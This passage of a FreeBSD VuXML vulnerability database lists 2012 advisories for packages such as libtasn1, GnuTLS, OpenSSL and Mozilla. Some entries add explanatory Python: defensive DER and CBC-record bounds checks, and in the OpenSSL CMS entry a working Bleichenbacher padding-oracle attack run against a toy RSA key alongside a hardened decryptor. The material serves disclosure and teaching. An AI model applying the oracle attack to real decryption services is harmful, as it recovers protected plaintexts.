<topic>Apache Traffic Server -- heap overflow vulnerability</topic>
<affects>
<package>
<name>trafficserver</name>
<range><lt>3.0.4</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>CERT-FI reports:</p>
<blockquote cite="https://www.cert.fi/en/reports/2012/vulnerability612884.html">
<p>A heap overflow vulnerability has been found in the HTTP
(Hypertext Transfer Protocol) protocol handling of Apache
Traffic Server. The vulnerability allows an attacker to cause
a denial of service or potentially to execute his own code by
sending a specially modified HTTP message to an affected
server.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0256</cvename>
</references>
<dates>
<discovery>2012-03-22</discovery>
<entry>2012-03-24</entry>
</dates>
</vuln>
<vuln vid="2e7e9072-73a0-11e1-a883-001cc0a36e12">
<topic>libtasn1 -- ASN.1 length decoding vulnerability</topic>
<affects>
<package>
<name>libtasn1</name>
<range><lt>2.12</lt></range>
</package>
<package>
<name>gnutls</name>
<range><lt>2.12.18</lt></range>
</package>
<package>
<name>gnutls-devel</name>
<range><gt>2.99</gt><lt>3.0.16</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Mu Dynamics, Inc. reports:</p>
<blockquote cite="http://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/5959">
<p>Various functions using the ASN.1 length decoding logic in
Libtasn1 were incorrectly assuming that the return value from
asn1_get_length_der is always less than the length of the
enclosing ASN.1 structure, which is only true for valid
structures and not for intentionally corrupt or otherwise
buggy structures.</p>
</blockquote>
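<p>The asn1_d2i_read_bio issue in the OpenSSL entry earlier in this file and this Libtasn1 issue share a root cause: a DER length field is attacker-controlled, and code that uses the decoded value before comparing it with the bytes actually present reads or allocates out of bounds. The following Python (an added example, not OpenSSL or Libtasn1 code) is a minimal DER TLV reader whose length decoder enforces that comparison, rejects the indefinite and non-minimal forms DER forbids, and bounds every child element by its parent's value. The sample encodings are constructed.</p>
<pre><![CDATA[
```python
# Added example, not OpenSSL or Libtasn1 code. A minimal DER reader whose
# length decoder never trusts the decoded value until it has been compared
# with the bytes actually present. Sample encodings are constructed.


class DERError(ValueError):
    """Malformed or untrustworthy DER input."""


def der_read_length(buf, pos):
    """Decode the DER length at buf[pos]; return (length, position of the value).

    Rejects the indefinite form, non-minimal long forms, length fields that run
    off the buffer, and any value larger than the data that follows it.
    """
    if pos >= len(buf):
        raise DERError("truncated: no length byte")
    first = buf[pos]
    pos += 1
    if first < 0x80:                       # short form
        length = first
    elif first == 0x80:
        raise DERError("indefinite length is not permitted in DER")
    else:                                  # long form: 0x80 | number of length bytes
        nbytes = first & 0x7F
        if nbytes > 4:
            raise DERError("%d-byte length field is not plausible" % nbytes)
        if pos + nbytes > len(buf):
            raise DERError("truncated length field")
        if buf[pos] == 0 and nbytes > 1:
            raise DERError("non-minimal length encoding (leading zero)")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        if length < 0x80:
            raise DERError("non-minimal length encoding (short form required)")
        pos += nbytes
    # The check the advisories describe as missing: the decoded length is
    # attacker-controlled and means nothing until it is compared with the
    # number of bytes that are really there.
    if length > len(buf) - pos:
        raise DERError("length %d exceeds the %d available bytes" % (length, len(buf) - pos))
    return length, pos


def der_read_tlv(buf, pos=0):
    """Return (tag, value, next_pos) for the element starting at buf[pos]."""
    if pos >= len(buf):
        raise DERError("truncated: no tag byte")
    tag = buf[pos]
    if tag & 0x1F == 0x1F:
        raise DERError("multi-byte tags are outside this example")
    length, start = der_read_length(buf, pos + 1)
    return tag, buf[start:start + length], start + length


def der_walk_sequence(buf):
    """Return [(tag, value), ...] for the children of a top-level SEQUENCE."""
    tag, body, end = der_read_tlv(buf, 0)
    if tag != 0x30:
        raise DERError("expected SEQUENCE, got tag 0x%02x" % tag)
    if end != len(buf):
        raise DERError("%d trailing bytes after SEQUENCE" % (len(buf) - end))
    children, pos = [], 0
    while pos < len(body):                 # every child is bounded by the parent's value
        ctag, cval, pos = der_read_tlv(body, pos)
        children.append((ctag, cval))
    return children


def der_rejects(buf):
    """True if der_walk_sequence refuses buf (used for the negative checks)."""
    try:
        der_walk_sequence(buf)
    except DERError:
        return True
    return False
```
]]></pre>
<p>In Python an over-long slice silently truncates, so the unchecked version of this code would merely return short values; in C the same decoded length feeds a memcpy or a malloc size, which is where the memory corruption in both advisories comes from. The test cases cover a valid two-element SEQUENCE, an inner element whose length claims 65535 bytes, an outer length larger than the input, and the indefinite, non-minimal and oversized length forms.</p>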
</body>
</description>
<references>
<cvename>CVE-2012-1569</cvename>
</references>
<dates>
<discovery>2012-03-20</discovery>
<entry>2012-03-21</entry>
<modified>2012-03-24</modified>
</dates>
</vuln>
<vuln vid="aecee357-739e-11e1-a883-001cc0a36e12">
<topic>gnutls -- possible overflow/Denial of service vulnerabilities</topic>
<affects>
<package>
<name>gnutls</name>
<range><lt>2.12.18</lt></range>
</package>
<package>
<name>gnutls-devel</name>
<range><gt>2.99</gt><lt>3.0.15</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Mu Dynamics, Inc. reports:</p>
<blockquote cite="http://article.gmane.org/gmane.comp.encryption.gpg.gnutls.devel/5959">
<p>The block cipher decryption logic in GnuTLS assumed that a
record containing any data which was a multiple of the block
size was valid for further decryption processing, leading to
a heap corruption vulnerability.</p>
</blockquote>
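<p>An added illustration (not GnuTLS code) of the check the advisory says was missing, using the TLS 1.x CBC record layout payload, MAC, padding, pad_len as the generic case: block alignment is necessary for a valid record but not sufficient, and every subtraction must be bounds-checked before it happens. The sample records are constructed; a production implementation must also perform these checks without leaking timing.</p>
<pre><![CDATA[
```python
# Added example, not GnuTLS code. The records below are constructed.


class RecordError(ValueError):
    """Raised when a decrypted CBC record cannot be laid out safely."""


def naive_payload_length(record_len, mac_len, pad_len):
    """The assumption the advisory describes: block alignment is taken as
    proof that the record is well-formed and the lengths are just subtracted.
    A negative result here is an unsigned underflow in C, and the MAC check
    or copy that follows then runs off the end of the buffer."""
    return record_len - mac_len - pad_len - 1


def split_cbc_record(decrypted, block_size, mac_len):
    """Return (payload, mac, pad_len) for a decrypted TLS 1.x style CBC record
    laid out as payload || MAC || padding || pad_len, checking every bound
    before it is used. Raises RecordError instead of computing a negative length."""
    n = len(decrypted)
    if n == 0 or n % block_size != 0:
        raise RecordError("record length %d is not a multiple of %d" % (n, block_size))
    # Alignment says nothing about content: there must be room for the MAC
    # and the padding-length byte before anything is subtracted.
    if n < mac_len + 1:
        raise RecordError("record too short to hold a MAC and a padding byte")
    pad_len = decrypted[-1]
    if pad_len + 1 + mac_len > n:
        raise RecordError("padding length %d exceeds the record" % pad_len)
    padding = decrypted[n - 1 - pad_len:n - 1]
    if any(b != pad_len for b in padding):      # TLS requires every pad byte == pad_len
        raise RecordError("inconsistent padding bytes")
    payload_len = n - mac_len - pad_len - 1
    return decrypted[:payload_len], decrypted[payload_len:payload_len + mac_len], pad_len


def cbc_rejects(decrypted, block_size, mac_len):
    """True if split_cbc_record refuses the record (for the negative checks)."""
    try:
        split_cbc_record(decrypted, block_size, mac_len)
    except RecordError:
        return True
    return False
```
]]></pre>
<p>A single 16-byte block with a 20-byte MAC is block-aligned and yet cannot contain a MAC at all; the naive arithmetic yields a negative payload length for it, while the checked version refuses the record before any length is derived from it.</p>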
</body>
</description>
<references>
<cvename>CVE-2012-1573</cvename>
</references>
<dates>
<discovery>2012-03-20</discovery>
<entry>2012-03-21</entry>
<modified>2012-03-24</modified>
</dates>
</vuln>
<vuln vid="0d530174-6eef-11e1-afd6-14dae9ebcf89">
<topic>asterisk -- multiple vulnerabilities</topic>
<affects>
<package>
<name>asterisk14</name>
<range><gt>1.4.*</gt><lt>1.4.44</lt></range>
</package>
<package>
<name>asterisk16</name>
<range><gt>1.6.*</gt><lt>1.6.2.23</lt></range>
</package>
<package>
<name>asterisk18</name>
<range><gt>1.8.*</gt><lt>1.8.10.1</lt></range>
</package>
<package>
<name>asterisk10</name>
<range><gt>10.*</gt><lt>10.2.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Asterisk project reports:</p>
<blockquote cite="https://www.asterisk.org/security">
<p>Stack Buffer Overflow in HTTP Manager</p>
<p>Remote Crash Vulnerability in Milliwatt Application</p>
</blockquote>
</body>
</description>
<references>
<url>http://downloads.asterisk.org/pub/security/AST-2012-002.html</url>
<url>http://downloads.asterisk.org/pub/security/AST-2012-003.html</url>
</references>
<dates>
<discovery>2012-03-15</discovery>
<entry>2012-03-15</entry>
</dates>
</vuln>
<vuln vid="60eb344e-6eb1-11e1-8ad7-00e0815b8da8">
<topic>OpenSSL -- CMS and S/MIME Bleichenbacher attack</topic>
<affects>
<package>
<name>openssl</name>
<range><lt>1.0.0_10</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The OpenSSL Team reports:</p>
<blockquote cite="http://www.openssl.org/news/secadv_20120312.txt">
<p>A weakness in the OpenSSL CMS and PKCS #7 code can be exploited
using Bleichenbacher's attack on PKCS #1 v1.5 RSA padding
also known as the million message attack (MMA).</p>
<p>Only users of CMS, PKCS #7, or S/MIME decryption operations are
affected. A successful attack needs on average 2^20 messages. In
practice only automated systems will be affected as humans will
not be willing to process this many messages.</p>
<p>SSL/TLS applications are *NOT* affected by this problem since
the SSL/TLS code does not use the PKCS#7 or CMS decryption
code.</p>
</blockquote>
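<p>As an added example (not OpenSSL code), the following Python builds the situation the advisory describes: a PKCS #1 v1.5 decryption routine whose block-type error is distinguishable from any later failure, the "conforming or not" oracle that gives the attacker, and Bleichenbacher's adaptive chosen-ciphertext attack recovering a plaintext from that single bit per query. The RSA key is a constructed toy (two primes straddling 2^32, so the modulus is 9 bytes and a random ciphertext is conforming about once in 256 tries); with a full-size modulus a random ciphertext conforms only about once in 2^16 tries, which is why the advisory counts the attack in the order of a million messages. A hardened unwrap that substitutes random bytes instead of reporting the failure is shown alongside.</p>
<pre><![CDATA[
```python
import random

# Added example, not OpenSSL code. Toy RSA key from two primes straddling 2**32:
# N is just above 2**64, so K = 9 bytes and a random ciphertext is conforming
# about once in 256 tries (once in 2**16 for a full-size modulus).
P, Q, E = 4294967291, 4294967311, 65537          # 2**32 - 5, 2**32 + 15
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))
K = (N.bit_length() + 7) // 8                    # modulus length in bytes

class PaddingError(Exception):
    """Raised by the leaky code when the PKCS #1 block type is wrong."""

def pkcs1_v15_pad(message, k, rng):
    """EB = 00 || 02 || PS (nonzero bytes) || 00 || M, as an integer."""
    ps_len = k - 3 - len(message)
    if ps_len < 1:
        raise ValueError("message too long for this modulus")
    ps = bytes(rng.randrange(1, 256) for _ in range(ps_len))
    return int.from_bytes(b"\x00\x02" + ps + b"\x00" + message, "big")

def vulnerable_unwrap(c):
    """Decrypt and strip padding; a bad block type fails differently from later errors."""
    em = pow(c, D, N).to_bytes(K, "big")
    if em[0] != 0 or em[1] != 2:
        raise PaddingError("PKCS #1 block type check failed")
    sep = em.find(b"\x00", 2)
    if sep < 0:
        raise ValueError("no separator after padding string")
    return em[sep + 1:]

def hardened_unwrap(c, expected_len, rng=random.SystemRandom()):
    """Fix pattern: never report a padding failure; return random bytes of the
    expected length instead, so later processing fails identically. (Production
    code must also make this timing-independent.)"""
    em = pow(c, D, N).to_bytes(K, "big")
    sep = em.find(b"\x00", 2)
    ok = em[0] == 0 and em[1] == 2 and sep >= 0 and K - sep - 1 == expected_len
    return em[sep + 1:] if ok else bytes(rng.randrange(256) for _ in range(expected_len))

def ceil_div(a, b):
    return -(-a // b)

def merge_intervals(intervals):
    merged = []
    for lo, hi in sorted(intervals):
        if merged and lo <= merged[-1][1] + 1:
            merged[-1] = (merged[-1][0], max(merged[-1][1], hi))
        else:
            merged.append((lo, hi))
    return merged

def bleichenbacher(c0, n, e, k, conforming):
    """Recover the padded plaintext behind c0 from the oracle alone (step numbers as in the 1998 paper)."""
    B = 1 << (8 * (k - 2))
    B2, B3 = 2 * B, 3 * B
    def ok(s):
        return conforming((c0 * pow(s, e, n)) % n)
    s = ceil_div(n, B3)                            # step 2a; c0 is conforming, so no blinding
    while not ok(s):
        s += 1
    M = [(B2, B3 - 1)]
    while True:
        new_M = []                                 # step 3: narrow every interval
        for a, b in M:
            for r in range(ceil_div(a * s - B3 + 1, n), (b * s - B2) // n + 1):
                lo = max(a, ceil_div(B2 + r * n, s))
                hi = min(b, (B3 - 1 + r * n) // s)
                if lo <= hi:
                    new_M.append((lo, hi))
        M = merge_intervals(new_M)
        if len(M) == 1 and M[0][0] == M[0][1]:     # step 4: one value left
            return M[0][0]
        if len(M) > 1:                             # step 2b: linear search for the next s
            s += 1
            while not ok(s):
                s += 1
            continue
        a, b = M[0]                                # step 2c: one interval, jump r
        r, s = ceil_div(2 * (b * s - B2), n), None
        while s is None:
            cands = range(ceil_div(B2 + r * n, b), (B3 - 1 + r * n) // a + 1)
            s = next((t for t in cands if ok(t)), None)
            r += 1

def run_attack(message=b"Y", seed=1):
    """Pad and encrypt `message`, then recover it through the leaky decryptor's
    error behaviour alone. Returns (recovered_message, oracle_queries)."""
    queries = [0]
    def conforming(c):                             # the attacker's oracle
        queries[0] += 1
        try:
            vulnerable_unwrap(c)
        except PaddingError:
            return False
        except ValueError:
            pass                                   # block type passed; failure came later
        return True
    m = pkcs1_v15_pad(message, K, random.Random(seed))
    em = bleichenbacher(pow(m, E, N), N, E, K, conforming).to_bytes(K, "big")
    return em[em.find(b"\x00", 2) + 1:], queries[0]
```
]]></pre>
<p>The oracle never sees the private key or the plaintext; it only learns whether the block-type check passed, and that is enough to shrink the interval containing the plaintext until one value remains. The hardened variant removes the signal by making a bad block type indistinguishable from any other failure, which is the approach a decryptor must take in addition to avoiding timing differences.</p>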
</body>
</description>
<references>
<cvename>CVE-2012-0884</cvename>
<url>http://www.openssl.org/news/secadv_20120312.txt</url>
</references>
<dates>
<discovery>2012-03-12</discovery>
<entry>2012-03-15</entry>
</dates>
</vuln>
<vuln vid="29194cb8-6e9f-11e1-8376-f0def16c5c1b">
<topic>nginx -- potential information leak</topic>
<affects>
<package>
<name>nginx</name>
<range><lt>1.0.14,1</lt></range>
</package>
<package>
<name>nginx-devel</name>
<range><lt>1.1.17</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>nginx development team reports:</p>
<blockquote cite="http://nginx.net/CHANGES">
<p>Matthew Daley recently discovered a security problem
which may lead to a disclosure of previously freed memory
on specially crafted response from an upstream server,
potentially resulting in sensitive information leak.</p>
</blockquote>
</body>
</description>
<references>
<url>http://nginx.net/CHANGES</url>
</references>
<dates>
<discovery>2012-03-15</discovery>
<entry>2012-03-15</entry>
</dates>
</vuln>
<vuln vid="a1050b8b-6db3-11e1-8b37-0011856a6e37">
<topic>mozilla -- multiple vulnerabilities</topic>
<affects>
<package>
<name>firefox</name>
<range><gt>4.0,1</gt><lt>10.0.3,1</lt></range>
<range><ge>3.6.*,1</ge><lt>3.6.28</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><lt>10.0.3,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><lt>2.8</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><lt>10.0.3</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><lt>2.8</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><gt>4.0</gt><lt>10.0.3</lt></range>
<range><gt>3.1.*</gt><lt>3.1.20</lt></range>
</package>
<package>
<name>libxul</name>
<range><gt>1.9.2.*</gt><lt>1.9.2.28</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-13 XSS with Drag and Drop and Javascript: URL</p>
<p>MFSA 2012-14 SVG issues found with Address Sanitizer</p>
<p>MFSA 2012-15 XSS with multiple Content Security Policy headers</p>
<p>MFSA 2012-16 Escalation of privilege with Javascript: URL as home page</p>
<p>MFSA 2012-17 Crash when accessing keyframe cssText after dynamic modification</p>
<p>MFSA 2012-18 window.fullScreen writeable by untrusted content</p>
<p>MFSA 2012-19 Miscellaneous memory safety hazards (rv:11.0/ rv:10.0.3 / rv:1.9.2.28)</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0451</cvename>
<cvename>CVE-2012-0455</cvename>
<cvename>CVE-2012-0456</cvename>
<cvename>CVE-2012-0457</cvename>
<cvename>CVE-2012-0458</cvename>
<cvename>CVE-2012-0459</cvename>
<cvename>CVE-2012-0460</cvename>
<cvename>CVE-2012-0461</cvename>
<cvename>CVE-2012-0462</cvename>
<cvename>CVE-2012-0463</cvename>
<cvename>CVE-2012-0464</cvename>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-13.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-14.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-15.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-16.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-17.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-18.html</url>
<url>http://www.mozilla.org/security/announce/2012/mfsa2012-19.html</url>
</references>
<dates>
<discovery>2012-03-13</discovery>
<entry>2012-03-14</entry>
<modified>2012-03-18</modified>
</dates>
</vuln>
<vuln vid="6d329b64-6bbb-11e1-9166-001e4f0fb9b1">
<topic>portaudit -- auditfile remote code execution</topic>
<affects>
<package>
<name>portaudit</name>
<range><lt>0.6.0</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Michael Gmelin and Jörg Scheinert have reported a remote
command execution vulnerability in portaudit.</p>
<p>An attacker who can get the user to use a specially crafted
audit file will be able to run commands on the users system,
with the privileges of the user running portaudit
(often root).</p>
<p>The attack could e.g. happen through DNS hijacking or a man
in the middle attack.</p>
<p>Note that if the user has set up portaudit to run from
periodic this attack could happen without direct user
interaction.</p>
<p>In the FreeBSD Ports Collection (bsd.port.mk) the check for
vulnerable ports at install-time directly operates on the
auditfile and has the same vulnerability as portaudit. As
the Ports Collection infrastructure does not have a version
number just be sure to have a Ports Collection new enough to
contain the fix for portaudit. Note that this is <em>only</em>
a problem for users who have portaudit installed, as they will
not have the audit database installed or downloaded
otherwise.</p>
</body>
</description>
<references>
<url>http://cvsweb.FreeBSD.org/ports/ports-mgmt/portaudit/Makefile#rev1.30</url>
<url>http://cvsweb.FreeBSD.org/ports/Mk/bsd.port.mk#rev1.707</url>
</references>
<dates>
<discovery>2012-03-11</discovery>
<entry>2012-03-11</entry>
</dates>
</vuln>
<vuln vid="9da3834b-6a50-11e1-91af-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.1r102.63</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-05.html">
<p>These vulnerabilities could cause a crash and potentially allow
an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0768</cvename>
<cvename>CVE-2012-0769</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-05.html</url>
</references>
<dates>
<discovery>2012-03-05</discovery>
<entry>2012-03-09</entry>
</dates>
</vuln>
<vuln vid="9448a82f-6878-11e1-865f-00e0814cab4e">
<topic>jenkins -- XSS vulnerability</topic>
<affects>
<package>
<name>jenkins</name>
<range><lt>1.453</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jenkins Security Advisory reports:</p>
<blockquote cite="https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-03-05">
<p>An XSS vulnerability was found in Jenkins core, which allows an
attacker to inject malicious HTMLs to pages served by Jenkins.
This allows an attacker to escalate his privileges by hijacking
sessions of other users. This vulnerability affects all
versions.</p>
</blockquote>
</body>
</description>
<references>
<url>https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-03-05</url>
</references>
<dates>
<discovery>2012-03-05</discovery>
<entry>2012-03-07</entry>
</dates>
</vuln>
<vuln vid="eba70db4-6640-11e1-98af-00262d8b701d">
<topic>dropbear -- arbitrary code execution</topic>
<affects>
<package>
<name>dropbear</name>
<range><ge>0.51</ge><lt>2012.55</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>IBM X-Force reports:</p>
<blockquote cite="http://xforce.iss.net/xforce/xfdb/73444">
<p>Dropbear SSH Server could allow a remote authenticated attacker
to execute arbitrary code on the system, caused by a use-after-
free error. If a command restriction is enforced, an attacker
could exploit this vulnerability to execute arbitrary code on
the system with root privileges.</p>
</blockquote>
</body>
</description>
<references>
<bid>52159</bid>
<cvename>CVE-2012-0920</cvename>
<url>http://secunia.com/advisories/48147</url>
<url>http://xforce.iss.net/xforce/xfdb/73444</url>
</references>
<dates>
<discovery>2012-02-22</discovery>
<entry>2012-03-04</entry>
</dates>
</vuln>
<vuln vid="46aeba13-64a1-11e1-bc16-0023ae8e59f0">
<topic>openx -- undisclosed security issue</topic>
<affects>
<package>
<name>openx</name>
<range><lt>2.8.9</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>OpenX does not provide information about vulnerabilities beyond their
existence.</p>
</body>
</description>
<references>
<url>http://blog.openx.org/12/security-matters-3</url>
</references>
<dates>
<discovery>2011-12-01</discovery>
<entry>2012-03-02</entry>
<modified>2012-07-08</modified>
</dates>
</vuln>
<vuln vid="174b8864-6237-11e1-be18-14dae938ec40">
<topic>databases/postgresql*-client -- multiple vulnerabilities</topic>
<affects>
<package>
<name>postgresql-client</name>
<range><lt>8.3.18</lt></range>
<range><ge>8.4</ge><lt>8.4.11</lt></range>
<range><ge>9</ge><lt>9.0.7</lt></range>
<range><ge>9.1</ge><lt>9.1.3</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The PostgreSQL Global Development Group reports:</p>
<blockquote cite="http://www.postgresql.org/about/news/1377/">
<p>These vulnerabilities could allow users to define triggers that
execute functions on which the user does not have EXECUTE
permission, allow SSL certificate spoofing and allow line breaks
in object names to be exploited to execute code when loading a
pg_dump file.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0866</cvename>
<cvename>CVE-2012-0867</cvename>
<cvename>CVE-2012-0868</cvename>
<url>http://www.postgresql.org/about/news/1377/</url>
</references>
<dates>
<discovery>2012-02-27</discovery>
<entry>2012-02-28</entry>
</dates>
</vuln>
<vuln vid="f63bf080-619d-11e1-91af-003067b2972c">
<topic>linux-flashplugin -- multiple vulnerabilities</topic>
<affects>
<package>
<name>linux-f10-flashplugin</name>
<range><lt>11.1r102.62</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<blockquote cite="https://www.adobe.com/support/security/bulletins/apsb12-03.html">
<p>These vulnerabilities could cause a crash and potentially allow
an attacker to take control of the affected system.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0751</cvename>
<cvename>CVE-2012-0752</cvename>
<cvename>CVE-2012-0753</cvename>
<cvename>CVE-2012-0754</cvename>
<cvename>CVE-2012-0755</cvename>
<cvename>CVE-2012-0756</cvename>
<cvename>CVE-2012-0767</cvename>
<url>https://www.adobe.com/support/security/bulletins/apsb12-03.html</url>
</references>
<dates>
<discovery>2012-02-15</discovery>
<entry>2012-02-27</entry>
</dates>
</vuln>
<vuln vid="57f1a624-6197-11e1-b98c-bcaec565249c">
<topic>libxml2 -- heap buffer overflow</topic>
<affects>
<package>
<name>libxml2</name>
<name>linux-f10-libxml2</name>
<range><lt>2.7.8_2</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Google Chrome team reports:</p>
<blockquote cite="http://googlechromereleases.blogspot.com/2012/01/stable-channel-update.html">
<p>Heap-based buffer overflow in libxml2, allows remote attackers
to cause a denial of service or possibly have unspecified other
impact via unknown vectors.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3919</cvename>
<url>http://googlechromereleases.blogspot.com/2012/01/stable-channel-update.html</url>
</references>
<dates>
<discovery>2012-01-05</discovery>
<entry>2012-02-27</entry>
</dates>
</vuln>
<vuln vid="ba51c2f7-5b43-11e1-8288-00262d5ed8ee">
<topic>plib -- remote code execution via buffer overflow</topic>
<affects>
<package>
<name>torcs</name>
<range><lt>1.3.3</lt></range>
</package>
<package>
<name>plib</name>
<range><le>1.8.5_3</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Secunia reports:</p>
<blockquote cite="http://secunia.com/advisories/47297/">
<p>A vulnerability has been discovered in PLIB, which can be
exploited by malicious people to compromise an application using
the library.</p>
<p>The vulnerability is caused due to a boundary error within the
"ulSetError()" function (src/util/ulError.cxx) when creating the
error message, which can be exploited to overflow a static
buffer.</p>
<p>Successful exploitation allows the execution of arbitrary code
but requires that the attacker can e.g. control the content of
an overly long error message passed to the "ulSetError()"
function.</p>
<p>The vulnerability is confirmed in version 1.8.5. Other versions
may also be affected.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-4620</cvename>
<url>http://secunia.com/advisories/47297/</url>
<url>http://torcs.sourceforge.net/index.php?name=News&amp;file=article&amp;sid=79</url>
</references>
<dates>
<discovery>2011-12-21</discovery>
<entry>2012-02-19</entry>
</dates>
</vuln>
<vuln vid="fdd1c316-5a3d-11e1-8d3e-e0cb4e266481">
<topic>phpMyAdmin -- XSS in replication setup</topic>
<affects>
<package>
<name>phpMyAdmin</name>
<range><gt>3.4</gt><lt>3.4.10.1</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The phpMyAdmin development team reports:</p>
<blockquote cite="http://www.phpmyadmin.net/home_page/security/PMASA-2012-1.php">
<p>It was possible to conduct XSS using a crafted database name.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-1190</cvename>
<url>http://www.phpmyadmin.net/home_page/security/PMASA-2012-1.php</url>
</references>
<dates>
<discovery>2012-02-18</discovery>
<entry>2012-02-18</entry>
</dates>
</vuln>
<vuln vid="da317bc9-59a6-11e1-bc16-0023ae8e59f0">
<topic>piwik -- xss and click-jacking issues</topic>
<affects>
<package>
<name>piwik</name>
<range><lt>1.7</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Piwik Team reports:</p>
<blockquote cite="http://piwik.org/blog/2012/02/7775/">
<p>We would like to thank the following security researchers for
their responsible disclosure of XSS and click-jacking issues:
Piotr Duszynski, Sergey Markov, Mauro Gentile.</p>
</blockquote>
</body>
</description>
<references>
<url>http://piwik.org/blog/2012/02/7775/</url>
</references>
<dates>
<discovery>2012-02-16</discovery>
<entry>2012-02-16</entry>
</dates>
</vuln>
<vuln vid="d7dbd2db-599c-11e1-a2fb-14dae9ebcf89">
<topic>mozilla -- heap-buffer overflow</topic>
<affects>
<package>
<name>firefox</name>
<range><ge>10.0,1</ge><lt>10.0.2,1</lt></range>
<range><ge>3.6.*,1</ge><lt>3.6.27</lt></range>
</package>
<package>
<name>linux-firefox</name>
<range><ge>10.0,1</ge><lt>10.0.2,1</lt></range>
</package>
<package>
<name>linux-seamonkey</name>
<range><ge>2.7</ge><lt>2.7.2</lt></range>
</package>
<package>
<name>linux-thunderbird</name>
<range><ge>10.0</ge><lt>10.0.2</lt></range>
</package>
<package>
<name>seamonkey</name>
<range><ge>2.7</ge><lt>2.7.2</lt></range>
</package>
<package>
<name>thunderbird</name>
<range><ge>10.0</ge><lt>10.0.2</lt></range>
<range><gt>3.1.*</gt><lt>3.1.19</lt></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>The Mozilla Project reports:</p>
<blockquote cite="http://www.mozilla.org/security/known-vulnerabilities/">
<p>MFSA 2012-11 libpng integer overflow</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2011-3026</cvename>
<url>https://www.mozilla.org/security/announce/2012/mfsa2012-11.html</url>
</references>
<dates>
<discovery>2012-02-16</discovery>
<entry>2012-02-17</entry>
<modified>2012-03-18</modified>
</dates>
</vuln>
<vuln vid="b4f8be9e-56b2-11e1-9fb7-003067b2972c">
<topic>Python -- DoS via malformed XML-RPC / HTTP POST request</topic>
<affects>
<package>
<name>python32</name>
<range><le>3.2.2_2</le></range>
</package>
<package>
<name>python31</name>
<range><le>3.1.4_2</le></range>
</package>
<package>
<name>python27</name>
<range><le>2.7.2_3</le></range>
</package>
<package>
<name>python26</name>
<range><le>2.6.7_2</le></range>
</package>
<package>
<name>python25</name>
<range><le>2.5.6_2</le></range>
</package>
<package>
<name>python24</name>
<range><le>2.4.5_8</le></range>
</package>
<package>
<name>pypy</name>
<!-- note that it also affects 1.8 but we do not yet have
this version in ports. -->
<range><le>1.7</le></range>
</package>
</affects>
<description>
<body xmlns="http://www.w3.org/1999/xhtml">
<p>Jan Lieskovsky reports,</p>
<blockquote cite="http://bugs.python.org/issue14001">
<p>A denial of service flaw was found in the way the Simple XML-RPC
Server module of Python processed client connections that were
closed before the complete request body had been received. A
remote attacker could use this flaw to cause a Python Simple
XML-RPC based server process to consume an excessive amount of
CPU.</p>
</blockquote>
</body>
</description>
<references>
<cvename>CVE-2012-0845</cvename>
<url>http://bugs.python.org/issue14001</url>
<url>https://bugzilla.redhat.com/show_bug.cgi?id=789790</url>
<url>https://bugs.pypy.org/issue1047</url>
</references>
<dates>
